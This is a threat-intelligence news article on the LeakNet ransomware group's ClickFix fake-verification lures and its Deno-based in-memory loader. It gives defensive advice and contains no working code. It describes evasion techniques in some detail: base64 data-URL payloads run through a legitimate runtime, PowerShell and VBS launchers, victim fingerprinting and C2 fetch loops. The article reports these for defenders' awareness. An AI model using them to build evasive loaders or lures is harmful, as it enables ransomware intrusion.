LeakNet Ransomware Uses ClickFix Lures and Deno Loader for Stealthy Attacks
Key Takeaways The LeakNet ransomware group has significantly escalated its operations, moving from an average of three victims monthly to a rapid expansion. The group now employs...
Key Takeaways
- The LeakNet ransomware group has significantly escalated its operations, moving from an average of three victims monthly to a rapid expansion.
- The group now employs “ClickFix” social engineering lures and a highly stealthy, Deno-based memory loader to bypass traditional security defenses.
- ClickFix lures are hosted on legitimate but compromised websites, presenting fake Cloudflare Turnstile checks to trick users into executing malicious commands.
- The Deno-based loader operates entirely in memory, making it exceptionally difficult for signature-based security tools to detect.
- Defenders should focus on behavioral monitoring, restrict user command execution, and implement network egress filtering to mitigate the threat.
LeakNet Ransomware Elevates Threat with ClickFix Lures and Stealthy Deno Loader
The LeakNet ransomware collective is undergoing a significant operational transformation, abandoning its previous, slower pace of approximately three victims per month in favor of a rapid expansion. This surge in activity is underpinned by the integration of sophisticated new tools specifically engineered to bypass the majority of existing security safeguards.
Table Of Content
Central to LeakNet’s updated arsenal are two critical additions: a cunning social engineering tactic dubbed ClickFix and a highly evasive, memory-resident loader built upon the Deno JavaScript runtime.
ClickFix: A Broader Net for Victim Acquisition
While ClickFix itself isn’t a novel technique within the threat landscape, its adoption by LeakNet signals a pivotal shift in the group’s victim acquisition strategy. Rather than relying on purchasing stolen access credentials from initial access brokers (IABs) in illicit online marketplaces, LeakNet now deploys deceptive verification pages on compromised, yet otherwise legitimate, websites.
When an unsuspecting user navigates to one of these tainted pages, they are presented with what appears to be a standard Cloudflare Turnstile verification prompt, instructing them to manually execute a specific command. This approach lacks a defined victim profile; instead, LeakNet casts a wide net, banking on a percentage of users to fall for the ruse.
Analysts at ReliaQuest meticulously documented this activity across multiple recent incidents, confidently attributing it to LeakNet due to consistent infrastructure and identical tactics, techniques, and procedures (TTPs). This strategic pivot away from IABs is a calculated move, eliminating a dependency that previously hampered the group’s speed and dramatically expanding the pool of potential targets. ClickFix has emerged as a favored delivery mechanism across the broader threat landscape, reportedly facilitating the distribution of 59% of the top malware families tracked in 2025.
This evolving methodology places any employee browsing the web at increased risk. Because these malicious lures reside on authentic websites rather than attacker-controlled domains, conventional network-layer defenses generate significantly fewer alerts. A red flag typically only appears after a user has already executed the malicious command, emphasizing the critical role of behavioral monitoring—especially for suspicious msiexec commands and unexpected outbound connections—over exclusive reliance on domain-based blocking.
What makes LeakNet’s current campaign particularly concerning is the consistent post-exploitation chain, which remains identical regardless of the initial entry point, whether through ClickFix or Microsoft Teams phishing. The group employs the same set of tools for execution, lateral movement, and payload staging, irrespective of how initial access was gained. This operational consistency, however, offers a valuable advantage for defenders: understanding these predictable steps provides clear opportunities for detection and prompt attack termination.
The Stealthy Deno-Based Loader
A technically sophisticated and particularly dangerous component of LeakNet’s updated toolkit is a previously undocumented loader built upon Deno, a legitimate JavaScript and TypeScript runtime widely used by developers. LeakNet employs a “bring-your-own-runtime” (BYOR) strategy: instead of deploying a custom malicious binary that might trigger security tools, the attackers install the authentic, trusted Deno executable on the victim’s machine, then leverage it to execute harmful code.
The loader is activated via PowerShell and Visual Basic Script files, frequently named Romeo*.ps1 and Juliet*.vbs. Crucially, LeakNet avoids writing a JavaScript file to disk, where it could be scanned, by instead feeding the payload to Deno as a base64-encoded data URL. Deno then decodes and executes this payload entirely in memory. This technique ensures that no standard file ever touches the endpoint, rendering the entire process virtually undetectable by signature-based security tools.
Upon execution, the loader gathers fundamental system information, including username, hostname, memory size, and operating system version, subsequently generating a unique victim fingerprint. It then establishes a connection to attacker-controlled infrastructure to retrieve a victim-specific second-stage payload, prevents duplicate instances by binding to a local port, and initiates a continuous loop of fetching and executing further code directly in memory.
What You Should Do
- Block Newly Registered Domains: LeakNet’s command-and-control (C2) servers are often newly registered. Implement policies to block access to domains registered within the last few weeks.
- Restrict User Command Execution: Limit the ability of regular users to run Win-R commands on their workstations to prevent direct execution of malicious instructions.
- Control PsExec Usage: Restrict PsExec to only authorized administrators through Group Policy Objects (GPOs) to prevent its misuse for lateral movement.
- Monitor for Anomalous Activity: Watch for signs of
jli.dllsideloading in theC:ProgramDataUSOShareddirectory, unusual PsExec activity, and unexpected outbound connections, especially to S3 buckets. - Implement Behavioral Monitoring: Prioritize security solutions capable of detecting suspicious behavioral patterns, particularly concerning unexpected process execution and outbound network connections, rather than relying solely on signature-based or domain-blocking tools.
- Isolate Compromised Hosts Immediately: Upon confirming post-exploitation behavior, promptly isolate the affected host to break the attack chain before ransomware deployment.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.